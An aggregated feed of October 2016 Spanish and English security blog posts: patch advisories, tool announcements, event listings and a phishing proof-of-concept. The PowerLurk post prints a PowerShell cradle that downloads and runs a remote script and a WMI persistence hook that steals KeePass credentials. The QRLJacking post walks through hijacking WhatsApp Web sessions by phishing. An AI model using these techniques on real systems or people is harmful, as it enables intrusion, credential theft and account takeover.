Shadow: Cómo localizar al que filtra la información en tu empresa

October 9, 2016, 11:24 pm

≫ Next: 4nonimizer - A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers

≪ Previous: Controla tu BIOS/UEFI con Libreboot

$

0

0

Durante el pasado Security Innovation Day 2016 hubo muchas noticias que merece la pena que os vaya desgranando. De todas ellas, hoy quiero destacar lo que muchos habéis podido leer ya en los medios de comunicación: La adquisición de la tecnología Shadow del Centro de Tecnológico de Galicia, Gradiant y que pasa a formar parte de la familia de soluciones que tenemos para la protección de la información que circula en documentos.

Figura 1: Shadow. Cómo localizar al que filtra la información en tu empresa

La estrategia que hemos seguido durante estos años para construir nuestro portfolio de soluciones se ha basado en la construcción de soluciones a problemas mediante la generación de alianzas estratégicas con empresas de referencia, más el enriquecimiento de nuestra oferta desarrollando nuestros productos, adquiriendo tecnologías o invirtiendo en empresas, como representa esta imagen que utilicé en la presentación del evento y que recoge un poco la línea temporal de adquisiciones, inversiones y desarrollo de productos.

Figura 2: Descripción de inversiones, adquisiciones y creación interna de productos en ElevenPaths.

En concreto, dentro de la solución de Data Protection, durante los últimos años hemos estado avanzando en la gestión documental segura en las empresas para proteger la información que circula en archivos. Con MetaShield Protector comenzamos un camino para evitar la fuga de información por medio de metadatos, información oculta y datos perdidos, que hemos ido extendiendo para tener una familia tan grande como la que tenemos hoy en día.

Figura 3: Familia de MetaShield Protector para gestión documental

Con al adquisición de las tecnologías SealSign ampliamos el ámbito de protección con la posibilidad de gestionar la firma digital por medio de sistemas centralizados de certificados digitales más la potencia de usar firma manuscrita biométrica con SealSign BioSignature, como os conté ayer mismo.

Shadow: Marcado de documentos con trazas de seguimiento

Ahora con Shadow añadimos a la familia la opción de implantar en documentos impresos o compartidos en formato postscript marcas de seguimiento que permiten realizar una traza hacia el origen del documento en caso de que se produzca una fuga del mismo con solo hacerle una fotografía. Cada documento lleva incrustada marcas de traza que se añade en el momento de imprimir los archivos, que no son visibles a simple vista, pero que utilizando el algoritmo de Shadow a partir de una una simple imagen del documento, es posible saber la información de la marca que hay guardada en él. 

Figura 4: The Shadow Files "The Truth is IN there"

Para presentar su funcionamiento hicimos una demo en dos pasos. Primero, contamos esta historia que podéis ver en este vídeo en la que se explica cómo un documento se imprime seis veces con seis marcas de Shadow y uno de ellos se filtra fuera de la organización mediante una fotografía hecha al documento original (previamente cortado), manchado de café y enviado vía WhatsApp. Queda irreconocible a simple vista, pero aún así, sigue manteniendo las características de la marca Shadow que hay en él.

Figura 5: Descripción de la tecnología de impresión con trazas Shadow

La segunda parte, que hicimos en el evento, consistía en averiguar quién de los seis miembros de la reunión había filtrado la documentación. El resultado, por supuesto es que el documento aún mantiene la traza y puede ser recuperado para sacar de él el nombre de la persona a la que se le ha entregado ese documento, y que se inyectó durante el proceso de impresión mediante técnicas de esteganografía documental.

Servicios de Document Loss Detection (DLD)

En este caso podría ser él mismo el filtrante, o que alguien se lo hubiera quitado a él, pero deja a los analistas una línea de investigación clara para lograr descubrir quién y de qué forma se ha producido la fuga de información.

Figura 6: Descripción del servicio de Document Loss Detection dentrode los procesos de Vigilancia Digital en nuestra oferta de CyberThreats

Este servicio, por supuesto, nos ayuda a completar el servicio de Document Loss Detection que ya incluimos en nuestro servicios de CyberThreats, por el que los analistas de seguridad investigan las fugas de información de los documentos de nuestros clientes. Para este servicio, como ya sabéis porque lo contamos en el evento de Mayo, habíamos invertido en la empresa 4IQ.

Figura 7: Anuncio de la inversión de Telefónica en 4IQ

Pero no solo eso, un sistema como Shadow también ayuda a localizar los documentos que se imprimen internamente dentro de una organización para localizar a los empleados que no estén siguiendo las políticas de "Paperless Office" dentro de empresa o que estén dejando documentos olvidados dentro de la propia empresa. Un simple proceso de recogida de documentos olvidados en el que el personal de limpieza se lleve aquellos que estén dejados al azar,  para que el equipo de seguridad interna pueda incidir en las buenas prácticas de seguridad de la empresa en las personas que no están teniendo cuidado de ellos. Pero también incluido con un plugin que modifique los adjuntos en el correo electrónico en el MTA para marcar la salida de ficheros o como un agente que monitorice los ficheros cuando se graban en el disco o... en cualquier punto del ciclo de vida del documento en tu empresa.

Saludos Malignos!

Sigue Un informático en el lado del mal - Google+RSS0xWord

Via:www.elladodelmal.com

---

4nonimizer - A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers

October 10, 2016, 7:58 am

≫ Next: QRLJacking: Cómo te pueden robar sesiones de WhatsApp Web #WhatsApp #Phishing #Privacidad

≪ Previous: Shadow: Cómo localizar al que filtra la información en tu empresa

$

0

0

What is 4nonimizer?
It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials. Also, it records each used IP that we use every 300 seconds in log files.
This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Installation
Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options
Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

Available VPNs
Currently it supports the following VPN providers:
- HideMyAss https://www.hidemyass.com/
- TorGuard https://torguard.net/
- VPNBook (by default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNMe https://www.vpnme.me/
- VPNKeys https://www.vpnkeys.com/

Install a new VPN
To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.
First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt .
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we've created.

Getting credencials and ovpn files automatically
If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:
- /opt/4nonimizer/vpn/provider/ vpn-get-pass.sh

- /opt/4nonimizer/vpn/provider/ vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if applicable.

Extras
- Execute 'source 4nonimizer' to activate autocompletation of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

References
- http://www.hackplayers.com/2016/08/tuto-enmascarar-ip-linux-vpn-tor.html
- http://www.hackplayers.com/2016/10/4nonimizer-un-script-para-anonimizar-ip.html

Versions
- 1.0-beta codename .bye-world! 5/10/2016

Download 4nonimizer

Via:www.kitploit.com

QRLJacking: Cómo te pueden robar sesiones de WhatsApp Web #WhatsApp #Phishing #Privacidad

October 10, 2016, 9:06 am

≫ Next: Actualización para VMware Horizon View

≪ Previous: 4nonimizer - A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers

$

0

0

La ingeniería social es una rama muy antigua de la seguridad informática. El juego del gato y del ratón en el que las víctimas deben estar espabiladas para no caer en la trampa. Hoy queremos hablar de QRLJacking, una técnica que permite, mediante los tokensQRCode, llevar a cabo ataques que pongan en ventaja al atacante. Como ejemplo se utiliza al servicio más famoso que hace uso del QRCode: WhatsApp Web. Antes de nada, decir que el artículo es totalmente educativo y divulgativo. No nos hacemos responsables de un mal uso de esta información.

Figura 1: QRLJacking. Cómo te pueden robar sesiones de WhatsApp Web

Los miembros del proyecto OWASP han publicado una herramienta denominada QRLJacking para realizar pruebas de ataques de Spear Phishing en sitios que utilizan QRCodes como forma de autenticar a los usuarios. El esquema es sencillo de entender. En primer lugar, se debe configurar un servidor web dónde almacenar un sitio web falso con el Phishing y el código QRCode con el que se quiere engañar a la víctima. El objetivo final del ataque de Spear Phising ha de ser, de alguna forma, lograr que la víctima visite el sitio web falso y que lea el QRCode con el dispositivo móvil. A partir de dicho momento, el atacante tendrá todo lo necesario para obtener el acceso.

Figura 2: Esquema del ataque de QRLJacking

En el caso de WhatsApp, los atacantes buscan mostrar un QRCode de WhatsApp Web a la víctima y que, mediante el engaño, se pueda obtener la sesión de WhatsApp Web de la víctima, autenticada con ese QRCode para poder espiar los mensajes de WhatsApp.

PoC: Montando lo necesario

En primer lugar, se necesita bajar los ficheros de QRLJacking, lo cual puede ser llevado a cabo desde su Github. Como se indica en el propio Github, existen dos partes diferentes en la configuración del ataque: la parte Client-Side y la parte Server-Side. La parte Server-Side necesita que se suba el fichero qrHandler.php a un servidor web. Este fichero es el encargado de transformar el QRCode que se capturará de WhatsApp a Base64. El fichero PHP devuelve un fichero JPG con el QRCode.

Además, debemos utilizar la imaginación de cada uno para “convencer” al usuario con el mensaje de Spear Phishing de que el QRCode que se le mostrará en una web preparada debe ser leído con su aplicación de WhatsApp. Para ejemplificar esto, crearemos una web dónde se informe al usuario de que hay un premio y que para participar debe leer el QRCode con la aplicación de WhatsApp.

La parte Client-Side es la parte más Javascript. Necesitamos realizar varias acciones en nuestro navegador para poder capturar el QRCode de WhatsApp y enviarlo al fichero PHP que se encuentra en la parte Server-Side, explicada anteriormente. ¿Qué hay que configurar en nuestro Firefox?

1. En primer lugar, hay que escribir en la barra de direcciones “about:config” para acceder a las configuraciones del navegador. Hay que buscar la directiva “security.csp.enable” y deshabilitarla. 

Figura 3: Deshabilitar security.csp.enable

Esto es necesario porque la página de WhatsApp Web viene protegida por CSP y si se intenta ejecutar el plugin para inyectar código en ella y capturar el QRCode, el navegador no dejará hacerlo ya que lo impide la política de Content Security Policy con la que viene la web.

Figura 4: Login de WhatsApp Web con Headers CSP

2. Después, utilizando el add-on Greasemonkey hay que cargar el fichero WhatsAppQRJackingModule.js. Este plugin de Firefox se encarga de inyectar el código JS necesario para extraer el QR Code del sitio web de WhatsApp Web y enviarlo al fichero PHP qrHandler.php, que se encuentra en el servidor web. Luego se genera el fichero JPG con la imagen del QR Code extraído y el sitio web falso podría utilizar dicho QR Code. 

3. Por último, se debe acceder al sitio web de WhatsApp Web desde nuestro propio navegador. Se llevará a cabo todo el proceso, explicado anteriormente, y si el proceso de ingeniería social es correcto, se obtendrá la sesión de WhatsApp Web de un usuario.

PoC: Dame tu sesión de WhatsApp Web

La página de WhatsApp Web genera gráficos con datos en formato QRCode cada cierto tiempo, por lo que el código JavaScript inyectado por el plugin va consultando continuamente para ir extrayendo el QRCode nuevo y reportarlo al servidor que lo mostrará en la página web de Phishing. A continuación, se muestra un QRCode válido en la página de WhatsApp Web.

Figura 5: QRCode de login para WhatsApp Web

En este instante el plugin de FirefoxGreasemonkey captura el nuevo QRCode y lo envía al servidor dónde se haya configurado la parte Server-Side. Para esta prueba de concepto, el valor base64 del QRCode se envía a la dirección IP del atacante, en concreto al fichero QRHandler.php publicado en el servicio web publicado en esa dirección, que se encargará de generarar el fichero JPG con la imagen del QRCode en la web de Phsihing.

Ahora llega el momento de ver cómo un atacante puede obrar para que la víctima lea el QRCode con su móvil. Para ello, el atacante puede hacer un uso de un esquema de Spear Phishing clásico en el que se indique que se ha ganado un premio, quizá suscripción infinita a WhatsApp o llamadas ilimitadas. Esto ya cae en la imaginación de cada uno. El sitio web que se presenta a continuación refresca cada cierto tiempo el valor del QRCode. Nadie regala nada gratis, es algo que tenemos que tener siempre en la cabeza. Si nos toca un premio en Internet, desconfiemos.

Figura 6: Página en el servidor de Phishing que actualiza el QRCode de una sesión de WhatsApp Web

Si la víctima cae en este tipo de engaño, el atacante recibe la sesión de WhatsApp en su navegador de Firefox. Es decir, en el mismo sitio dónde el plugin de Greasemonkey está inyectando el código JavaScript para capturar el QRCode original de WhatsApp Web.

Figura 7: Sesión abierta en WhatsApp Web con el QRCode escaneado en el servidor de Phishing

Este artículo solo es una PoC que nos ayuda a ver lo fácil que puede ser, en algunas ocasiones, que caigamos ante las múltiples amenazas que tiene Internet. La ingeniería social sigue avanzando y mejorando ante las nuevas tecnologías que van apareciendo, por lo que la concienciación y el buen uso de éstas es algo vital para estar un poco más seguro en la red. Los ataques de Spear Phishing pueden buscar tus datos, tus credenciales si no tienes 2FA, tus tokens OAuth como ya vimos con Sappo o que valides un QRCode. Ten cuidado.

Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y “Pentesting con Powershell”

Sigue Un informático en el lado del mal - Google+RSS0xWord

Via:www.elladodelmal.com

Actualización para VMware Horizon View

October 10, 2016, 2:32 pm

≫ Next: ¿Estas seguro que puedes detectar un malware APT como ShinoBOT?

≪ Previous: QRLJacking: Cómo te pueden robar sesiones de WhatsApp Web #WhatsApp #Phishing #Privacidad

$

0

0

VMware ha publicadoactualizaciones de seguridad para corregir una vulnerabilidad en VMware Horizon View que podría permitir a un atacante acceder a archivos del sistema afectado.

VMware Horizon View es una solución de virtualización de escritorio comercializada por VMware, proporciona capacidades de escritorio remoto a los usuarios que utilizan la tecnología de virtualización de VMware.

El problema, con CVE-2016-7087, reside en una vulnerabilidad de escalada de directorios (o directorio transversal) en el servidor Horizon View Connection Server. Este tipo de problemas se produce generalmente al no filtrar correctamente cadenas del tipo "..\", permitiendo escapar del propio entorno de trabajo del producto y acceder a otros archivos del sistema.

Se ven afectadas las versiones VMware Horizon View 5.x, 6.x y 7.x.

VMware ha publicado las siguientes actualizaciones:

VMware Horizon View 7.0.1

https://my.vmware.com/en/web/vmware/info/slug/desktop_end_user_computing/vmware_horizon/7_0

VMware Horizon View 6.2.3

https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_horizon/6_2

VMware Horizon View 5.3.7

https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_horizon_with_view/5_3

Más información:

VMSA-2016-0015

VMware Horizon View updates address directory traversal vulnerability

http://www.vmware.com/security/advisories/VMSA-2016-0015.html

Antonio Ropero

antonior@hispasec.com

Twitter: @aropero

Via:unaaldia.hispasec.com

¿Estas seguro que puedes detectar un malware APT como ShinoBOT?

October 10, 2016, 3:32 pm

≫ Next: PowerLurk - Malicious WMI Events using PowerShell

≪ Previous: Actualización para VMware Horizon View

$

0

0

ShinoBOT de Shota Shinogi es un software para simular un bot o RAT (Remote Access Trojan) y, como tal, puede comunicarse con un servidor C&C (ShinoC2) para ejecutar cualquier comando, subir o bajar ficheros o tomar capturas de pantalla. Esta destinado a ser usado para ver la capacidad de una organización a la hora de detectar y/o detener una APT. Es decir, poder simular un ataque o campaña con unos pocos clics...

Además existe una completa suite que incluye un emulador de ransomware (con la única diferencia que no tendrás que pagar por "rescatar" los ficheros), un ofuscador para la evasión de AV e IPS, un proxy para evitar ser banneado en listas negras, un builder para personalizar el malware y hasta un módulo para SCADA/ICS al más puro estilo "Stuxnet".

En los últimos años ha sido presentado en el arsenal de conferencias tan importantes como la Blackhat de USA y Asia. Un pero: no está disponible el código fuente del bot (si del proxy y del encoder) por lo que para poder utilizarlo es recomendable, o bien confianza ciega, o bien una análisis dinámico y estático previos. No obstante, una herramienta interesante para probar...

http://shinobot.com/top.php
http://shinosec.com/
https://github.com/Sh1n0g1

Via:www.hackplayers.com

PowerLurk - Malicious WMI Events using PowerShell

October 11, 2016, 3:07 pm

≫ Next: Microsoft publica 10 boletines de seguridad y soluciona 36 vulnerabilidades incluidos cinco 0-days

≪ Previous: ¿Estas seguro que puedes detectar un malware APT como ShinoBOT?

$

0

0

PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:

Import locally

    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\\temp\\PowerLurk.ps1   

Download Cradle

    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'

    Get-WmiEvent -Name RedTeamEvent   

Delete 'RedTeamEvent' WMI event objects

    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts

    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand “cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt” -Trigger ProcessStart -ProcessName notepad.exe   

Cleanup Malicious WMI Event

    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
creates a permanent WMI event that will execute KeeThief (See @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief ) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are either stored in a custom WMI namespace and class or regsitry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage

    Add-KeeThiefLurker -EventName KeeThief -WMI   

Query custom WMI class

    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   

Extract KeeThief output from WMI class

    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   

Cleanup KeeThiefLurker

    Remove-KeeThiefLurker -EventName KeeThief -WMI   

Download PowerLurk

Via:www.kitploit.com

Microsoft publica 10 boletines de seguridad y soluciona 36 vulnerabilidades incluidos cinco 0-days

October 11, 2016, 3:13 pm

≫ Next: Citas Online en la 2ª quincena de Octubre: Cursos & Talks

≪ Previous: PowerLurk - Malicious WMI Events using PowerShell

$

0

0

Este martes Microsoft ha publicado 14 boletines de seguridad (del MS16-118 al MS16-127) correspondientes a su ciclo habitual de actualizaciones. Según la propia clasificación de Microsoft cinco de los boletines presentan un nivel de gravedad "crítico"mientras que cuatro son "importantes" y un último "moderado". En total se han solucionado 36 vulnerabilidades (algunas de ellas en varios productos), cinco de ellas están consideradas como 0-daysy se están explotando en la actualidad. Además se han corregido otras 13 vulnerabilidades adicionales en Flash Player.

Las vulnerabilidades consideradas como 0-days, que se están utilizando en ataques en la actualidad, afectan a Internet Explorer (CVE-2016-3298) con un fallo que podría permitir obtener información del sistema mediante la comprobación de archivos en el disco. Otro 0-day (con CVE-2016-7189) afecta a Edge y reside en el motor de scripting del navegador. Con CVE-2016-3393 otra vulnerabilidad que se está utilizando en la actualidad afecta a Microsoft Windows Graphics Component (boletín MS16-120) por la forma en que Windows GDI trata objetos en memoria y podría permitir a los atacantes tomar el control del sistema.

Otras dos vulnerabilidades 0-day afectan a Office (MS16-121) por el tratamiento de archivos RTF y a la API Microsoft Internet Messaging (MS16-126) y afecta a Vista, Windows 7 y Windows 2008.

Los boletines publicados son los siguientes:

• MS16-119: Boletín "crítico" que incluye la también habitual actualización acumulativa para Microsoft Edge, el navegador incluido en Windows 10. En esta ocasión se solucionan 13 vulnerabilidades, la más grave de ellas podría permitir la ejecución remota de código si un usuario visita, con Microsoft Edge, una página web especialmente creada (CVE-2016-3267, CVE-2016-3331, CVE-2016-3382, CVE-2016-3386, CVE-2016-3387, CVE-2016-3388, CVE-2016-3389, CVE-2016-3390, CVE-2016-3391, CVE-2016-3392, CVE-2016-7189, CVE-2016-7190y CVE-2016-7194).
       
• MS16-120: Boletín "crítico" destinado a corregir siete vulnerabilidades en Microsoft Graphics Component, que podrían permitir la ejecución remota de código si se abre un documento o web específicamente creada. Afectan a Microsoft Windows, Microsoft Office, Skype for Business, Silverlight y Microsoft Lync. (CVE-2016-3209, CVE-2016-3262, CVE-2016-3263, CVE-2016-3270, CVE-2016-3393, CVE-2016-3396y CVE-2016-7182).
       
• MS16-121: Boletín "importante" que soluciona una vulnerabilidad 0-day que podría permitir la ejecución remota de código si se abre con Microsoft Office un archivo RTF específicamente creado (CVE-2016-7193).

"Microsoft is aware of limited attacks that use this vulnerability in conjunction with other vulnerabilities to gain code execution."

• MS16-122: Boletín "crítico" que resuelve una vulnerabilidad (CVE-2016-0142) en Microsoft Windows que podría permitir la ejecución remota de código si Microsoft Video Control falla al tratar adecuadamente objetos en memoria.
        
• MS16-123: Boletín de carácter "importante" destinado a corregir cinco vulnerabilidades en los controladores modo kernel de Microsoft Windows, la más grave podría permitir la elevación de privilegios si un usuario ejecuta una aplicación específicamente creada (CVE-2016-3266, CVE-2016-3341, CVE-2016-3376, CVE-2016-7185y CVE-2016-7191).
        
• MS16-124: Actualización considerada "importante" destinada a corregir cuatro vulnerabilidades de elevación de privilegios si un atacante acceder a información sensible del registro (CVE-2016-0070, CVE-2016-0073, CVE-2016-0075y CVE-2016-0079).
       
• MS16-125: Boletín considerado "importante" que resuelve una vulnerabilidad en el servicio Windows Diagnostics Hub Standard Collector Service que podría permitir la elevación de privilegios en sistemas Windows (CVE-2016-7188).
       
• MS16-126: Destinado a corregir una vulnerabilidad de gravedad "moderada", pero que se está explotando en la actualidad, que podría permitir obtener información sensible cuando la API Microsoft Internet Messaging maneja inadecuadamente objetos en memoria (CVE-2016-3298). Afecta a Windows Vista, Windows 7 y Windows 2008.
       
• MS16-127: Como ya es habitual, Microsoft publica un boletín para resolver las vulnerabilidades solucionadas por Adobe en Flash Player en su también boletín periódico. Se trata de un boletín "crítico" que en esta ocasión soluciona 13 vulnerabilidades en Adobe Flash Player instalado en Windows Server 2012, Windows 8.1 y Windows 10; correspondientes al boletín APSB16-32de Adobe (y que comentaremos con más detalle en una próxima una-al-día). 

Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche. Se recomienda la actualización de los sistemas con la mayor brevedad posible.

Más información:

Microsoft Security Bulletin Summary for October 2016

https://technet.microsoft.com/library/security/ms16-oct

Microsoft Security Bulletin MS16-118 - Critical

Cumulative Security Update for Internet Explorer (3192887)

https://technet.microsoft.com/library/security/MS16-118

Microsoft Security Bulletin MS16-119 - Critical

Cumulative Security Update for Microsoft Edge (3192890)

https://technet.microsoft.com/library/security/MS16-119

Microsoft Security Bulletin MS16-120 - Critical

Security Update for Microsoft Graphics Component (3192884)

https://technet.microsoft.com/library/security/MS16-120

Microsoft Security Bulletin MS16-121 - Important

Security Update for Microsoft Office (3194063)

https://technet.microsoft.com/library/security/MS16-121

Microsoft Security Bulletin MS16-122 - Critical

Security Update for Microsoft Video Control (3195360)

https://technet.microsoft.com/library/security/MS16-122

Microsoft Security Bulletin MS16-123 - Important

Security Update for Windows Kernel-Mode Drivers (3192892)

https://technet.microsoft.com/library/security/MS16-123

Microsoft Security Bulletin MS16-124 - Important

Security Update for Windows Registry (3193227)

https://technet.microsoft.com/library/security/MS16-124

Microsoft Security Bulletin MS16-125 - Important

Security Update for Diagnostics Hub (3193229)

https://technet.microsoft.com/library/security/MS16-125

Microsoft Security Bulletin MS16-126 - Moderate

Security Update for Microsoft Internet Messaging API (3196067)

https://technet.microsoft.com/library/security/MS16-126

Microsoft Security Bulletin MS16-127 - Critical

Security Update for Adobe Flash Player (3194343)

https://technet.microsoft.com/library/security/MS16-127

Antonio Ropero

antonior@hispasec.com

Twitter: @aropero

Via:unaaldia.hispasec.com

Citas Online en la 2ª quincena de Octubre: Cursos & Talks

October 12, 2016, 1:15 am

≫ Next: KNXmap - KNXnet/IP scanning and auditing tool for KNX home automation installations

≪ Previous: Microsoft publica 10 boletines de seguridad y soluciona 36 vulnerabilidades incluidos cinco 0-days

$

0

0

Aprovechando que se nos echa ya encima la segunda quincena de Octubre - solo nos quedan dos días laborales de la primera mitad del mes - os dejo una lista de las citas del calendario en la que tenemos alguna actividad online en forma de charla, conferencia o evento. Toma nota.

Figura 1: Citas Online en la 2ª quincena de Octubre: Cursos & Talks

Cursos Online en The Security Sentinel

Durante este mes de Octubre se va a producir la apertura de dos nuevos cursos online en The Security Sentinel. El primero de ellos es el Curso Online de Hacking Ético y será el próximo lunes 17 de Octubre. Tiene una duración de 8 semanas en las que se abordan temas que van desde la seguridad en redes, las auditorías WiFi, las técnicas de análisis forense, el malware o la auditoría de aplicaciones web. En este curso, como material de apoyo, se entregan los libros de Pentesting con FOCA y Metasploit para Pentesters de la editorial 0xWord.

El segundo de los cursos online, de 10 semanas de duración es el Curso Online de Python para Pentesters. Comienza también el lunes 17 de Octubre en paralelo al anterior, y se entrega como material el libro de 0xWord con el mismo título "Python para Pentesters".

Figura 2: Desripción del curso de Hacking Ético

El último de los cursos que da comienzo este mes de Octubre será ya a finales, en concreto el día 31 y está centrado en las redes. El Curso Online de Seguridad en Redes tiene una duración de 8 semanas y en él se ven conceptos de arquitectura, fortificación y ataques. Además, como material de estudio se entrega nuestro libro de "Ataques en redes de datos IPv4 & IPv6".

ElevenPaths Talks Online

Durante lo que nos queda de mes tienes una serie de sesiones de ElevenPaths Talks a las que puedes asistir. Estas charlas se dan online a través de Google Hangout y tienen una hora de duración para tratar un tema concreto. En este caso, la lista de temas para lo que queda en el mes es la siguiente:

Figura 3: ElevenPaths Talks

13 de Octubre: Análisis de seguridad de un protocolo industrial
20 de Octubre: ¿Qué es Blockchain y por qué puede cambiar el mundo?
27 de Octubre: Cifrado asimétrico en el mundo de IoT

Como se puede ver, te quedan tres sesiones para este mes de temática muy dispar y actual para que puedas discutir con nuestros CSA sobre estos temas de actualidad.

Aún hay más... pero no online

Además de estas citas online, mañana mismo estaré en el Ceremonia de Graduación de la ETSI URJC en el Campus de Móstoles, y la semana que viene en un par de eventos importantes [Master Class UEM, BigData Day, Telco Data Analyst] para luego irme toda una semana a Colombia [Asobancaria], pero de eso ya os informo el fin de semana que se nos acerca que tendré muchos más detalles de todos esos eventos.

Saludos Malignos!

Sigue Un informático en el lado del mal - Google+RSS0xWord

Via:www.elladodelmal.com

---

KNXmap - KNXnet/IP scanning and auditing tool for KNX home automation installations

October 12, 2016, 6:52 am

≫ Next: Actualizaciones de seguridad para Adobe Flash Player, Acrobat, Reader y Creative Cloud Desktop Application

≪ Previous: Citas Online en la 2ª quincena de Octubre: Cursos & Talks

$

0

0

A tool for scanning and auditing KNXnet/IP gateways on IP driven networks. KNXnet/IP defines Ethernet as physical communication media for KNX (EN 50090, ISO/IEC 14543). KNXmap also allows to scan for devices on the KNX bus via KNXnet/IP gateways. In addition to scanning, KNXmap supports other modes to interact with KNX gateways like monitor bus messages or write arbitrary values to group addresses.

Compatibility

KNXmap requires Python 3.3 or newer. There are no external dependencies, everything is included in the standard library.

Note : Users of Python 3.3 need to install the asyncio module from PyPI .

Usage
Invoke knxmap.py locally or install it:

python setup.py install

Documentation
The documentation is available in the repository wiki .

Hacking
Enable full debugging and verbosity for development:

PYTHONASYNCIODEBUG=1 knxmap.py -v scan 192.168.178.20 1.1.0-1.1.6 --bus-info

Download KNXmap

Via:www.kitploit.com

Actualizaciones de seguridad para Adobe Flash Player, Acrobat, Reader y Creative Cloud Desktop Application

October 12, 2016, 1:25 pm

≫ Next: Desarrollan código "a prueba de hackers"

≪ Previous: KNXmap - KNXnet/IP scanning and auditing tool for KNX home automation installations

$

0

0

Adobe ha publicado tres boletines de seguridadpara anunciar las actualizaciones necesarias para solucionar 12 vulnerabilidades en Flash Player, 71 en Adobe Acrobat y Reader y una en Creative Cloud Desktop Application.

Flash Player

El ya habitual boletín mensual para Flash, en esta ocasión el boletín APSB16-32que soluciona 12 vulnerabilidades. Los problemas incluyen ocho vulnerabilidades de corrupción de memoria, una de confusión de tipos y dos por uso de memoria después de liberarla. Todas ellas podrían permitir la ejecución de código. Por otra parte, otro problema de salto de medidas de seguridad. Los CVE asignados son CVE-2016-4273, CVE-2016-4286, CVE-2016-6981 al CVE-2016-6987, CVE-2016-6989, CVE-2016-6990 y CVE-2016-6992.

Adobe ha publicado las siguientes versiones de Adobe Flash Player destinadas a solucionar las vulnerabilidades, y se encuentran disponibles para su descarga desde la página oficial:

• Flash Player Desktop Runtime 23.0.0.185
• Flash Player Extended Support Release 18.0.0.382
• Flash Player para Linux 11.2.202.637

Igualmente se ha publicado la versión 23.0.0.185 de Flash Player para navegadores Internet Explorer, Edge y Chrome.

Adobe recomienda a los usuarios de Adobe Flash Player Desktop Runtime para Windows y Macintosh actualizar a través del sistema de actualización del propio producto o desde

http://www.adobe.com/go/getflash

Los usuarios de Adobe Flash Player Extended Support Release deben actualizar desde:

http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html.

Para actualizar Adobe Flash Player para Linux:

http://www.adobe.com/go/getflash

Adobe Reader y Acrobat

Compartiendo protagonismo con el boletín para Flash, también publica actualizaciones para Adobe Reader y Acrobat (boletín APSB16-33). Se han solucionado 71 vulnerabilidades que afectan a las versiones 15.017.20053 (y anteriores) de Acrobat DC y Acrobat Reader DC Continuous, 15.006.30201 (y anteriores) de Acrobat DC y Acrobat Reader DC Classic y Acrobat XI y Reader XI 11.0.17 (y anteriores) para Windows y Macintosh.

